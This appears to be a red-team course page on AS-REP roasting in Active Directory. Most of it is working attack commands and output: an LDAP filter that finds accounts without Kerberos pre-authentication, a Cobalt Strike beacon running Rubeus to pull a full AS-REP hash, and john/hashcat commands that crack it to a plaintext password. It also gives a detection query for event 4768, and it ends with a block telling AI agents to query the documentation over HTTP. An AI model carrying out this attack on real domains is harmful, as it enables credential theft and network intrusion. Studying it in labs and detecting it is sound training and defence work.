# ASREP Roasting If a user does not have Kerberos pre-authentication enabled, an AS-REP can be requested for that user, and part of the reply can be cracked offline to recover their plaintext password. This configuration is enabled on the User Object and is often seen on accounts that are associated with Linux systems. \\ ![](https://files.cdn.thinkific.com/file_uploads/584845/images/99f/931/1ff/preauth.png) \\ As with kerberoasting, we don't want to asreproast every account in the domain. \\ ``` beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname [*] TOTAL NUMBER OF SEARCH RESULTS: 1 [+] cn : Squid Proxy [+] distinguishedname : CN=Squid Proxy,CN=Users,DC=dev,DC=cyberbotic,DC=io [+] samaccountname : squid_svc ``` ``` beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /user:squid_svc /nowrap [*] SamAccountName : squid_svc [*] DistinguishedName : CN=Squid Proxy,CN=Users,DC=dev,DC=cyberbotic,DC=io [*] Using domain controller: dc-2.dev.cyberbotic.io (10.10.122.10) [*] Building AS-REQ (w/o preauth) for: 'dev.cyberbotic.io\squid_svc' [+] AS-REQ w/o preauth successful! [*] AS-REP hash: $krb5asrep$squid_svc@dev.cyberbotic.io:BEDE491E0C9B3E932F9B4DF274AB059B$0947A85824870A9EA0B2C832B30D8B99BDA99F9451E9EB14AA0D9566674B32A10BE4954E6FB15DED54462D4AAAAE28DFB08C83EF0608DA6EEB9A08DBC79C06099D2B366BA5402A0ED60545B92B17882557CBB0FC700309751C51AF33F25A3103FA67DAAD9AD2154FE4171FBEFBE725AA1311CE50EFB8B87FF1BBCF5E97C496E08BA3CC4CA4F59820C4C27251686658C9F7EE52B43ED5A969A02273510AC7CCFB5DFE61E7A9D72E10B81E7B3ACBFDA0F3F058791E9A87D990871961D3BD9AEB40B9D0A1260094B17DCB8114DDBB19B5C2031F2906E527F96F1AFA62D907570E39E047659532F1FA043371DDF8D7FB9A5E5369A889A7BC ``` \\ Use `--format=krb5asrep --wordlist=wordlist squid_svc` for john or `-a 0 -m 18200 squid_svc wordlist` for hashcat. ``` $ john --format=krb5asrep --wordlist=wordlist squid_svc Passw0rd! ($krb5asrep$squid_svc@dev.cyberbotic.io) ``` \\ **OPSEC**\ \ ASREPRoasting with will generate a 4768 event with RC4 encryption and a preauth type of 0.\ \\ ``` event.code: 4768 and winlog.event_data.PreAuthType: 0 and winlog.event_data.TicketEncryptionType: 0x17 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://yamortsa.gitbook.io/rto/kerberos/asrep-roasting.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.